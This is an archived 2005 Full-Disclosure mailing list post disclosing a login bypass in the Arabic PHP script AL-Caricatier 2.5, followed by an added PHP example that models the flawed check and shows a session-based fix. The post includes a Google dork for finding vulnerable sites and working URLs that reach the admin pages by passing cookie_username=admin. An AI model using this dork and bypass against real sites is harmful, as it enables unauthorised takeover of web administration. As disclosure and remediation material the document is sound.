Full Disclosure mailing list archives
Vulnerability in AL-Caricatier, V.2.5 And Prior Versions
From: "God Of Death (G.O.D)" <mohajali2k4 () gmail com>
Date: Sat, 22 Oct 2005 18:41:06 +0200
Vulnerability in AL-Caricatier, V.2.5

Hello...

I found a vulnerability in a program called AL-Caricatier. It's an Arabic program.

Site: http://www.php-ar.com
Vulnerability: Login Bypass
GoogleDork: inurl:view_caricatier.php

The vulnerability is in an included file called ss.php, which resides in the admin directory...

    if($cookie_username){
        echo"";
    }else{
        echo"<font face='tahoma' size='2'>You Didn't Sign in لم تقم بتسجيل الدخول</b>";
        echo"<meta http-equiv='Refresh' content='1; url=admin_login.php'>";
        EXIT;
    }

The admin directory is protected by user and password, but u can bypass them by going to this link:

www.victim.com/view_caricatier.php

To bypass:

www.victim.com/admin/welcome.php?cookie_username=admin

or any of the admin files instead of welcome.php, like:

add-flashFile.php
caricatier_add.php
delete_cat.php

and u r in the admin interface...

--
(r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF Genuises....(c)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
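
The check quoted in the post next to a hardened form, as an added example that is not part of the original post and is not AL-Caricatier code. It assumes request parameters reach ss.php as variables (which the `?cookie_username=admin` URL implies) and that the login handler stores the verified name under a session key; `legacy_is_signed_in()`, `current_admin()`, `require_admin()` and `admin_user` are hypothetical names.

```php
<?php
// Added illustration, not AL-Caricatier code. Hypothetical names:
// legacy_is_signed_in(), current_admin(), require_admin(), 'admin_user'.

// Model of the ss.php check, assuming request parameters reach the script
// as variables (which the ?cookie_username=admin URL in the post implies).
function legacy_is_signed_in(array $requestVars): bool
{
    return !empty($requestVars['cookie_username']);
}

// Hardened check: consult only server-side session state that the login
// handler wrote after verifying the password.
function current_admin(array $session): ?string
{
    $user = $session['admin_user'] ?? null;
    return (is_string($user) && $user !== '') ? $user : null;
}

// Guard to include at the top of every admin page in place of ss.php.
function require_admin(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start(['cookie_httponly' => true, 'use_strict_mode' => true]);
    }
    $user = current_admin($_SESSION);
    if ($user === null) {
        // Real redirect plus exit: no admin markup is sent to the client.
        header('Location: admin_login.php', true, 302);
        exit;
    }
    return $user;
}

// Constructed demo, run from the command line only.
if (PHP_SAPI === 'cli') {
    $request = ['cookie_username' => 'admin'];   // constructed request input
    $noSession = [];                             // visitor never logged in
    $loggedIn = ['admin_user' => 'admin'];       // constructed session after login

    printf("legacy check, forged parameter: %s\n",
        var_export(legacy_is_signed_in($request), true));
    printf("session check, no login:        %s\n",
        var_export(current_admin($noSession), true));
    printf("session check, after login:     %s\n",
        var_export(current_admin($loggedIn), true));
}
```

The session-based guard never reads `$_GET`, `$_POST` or `$_COOKIE`, so a client-supplied `cookie_username` value has no effect on the decision.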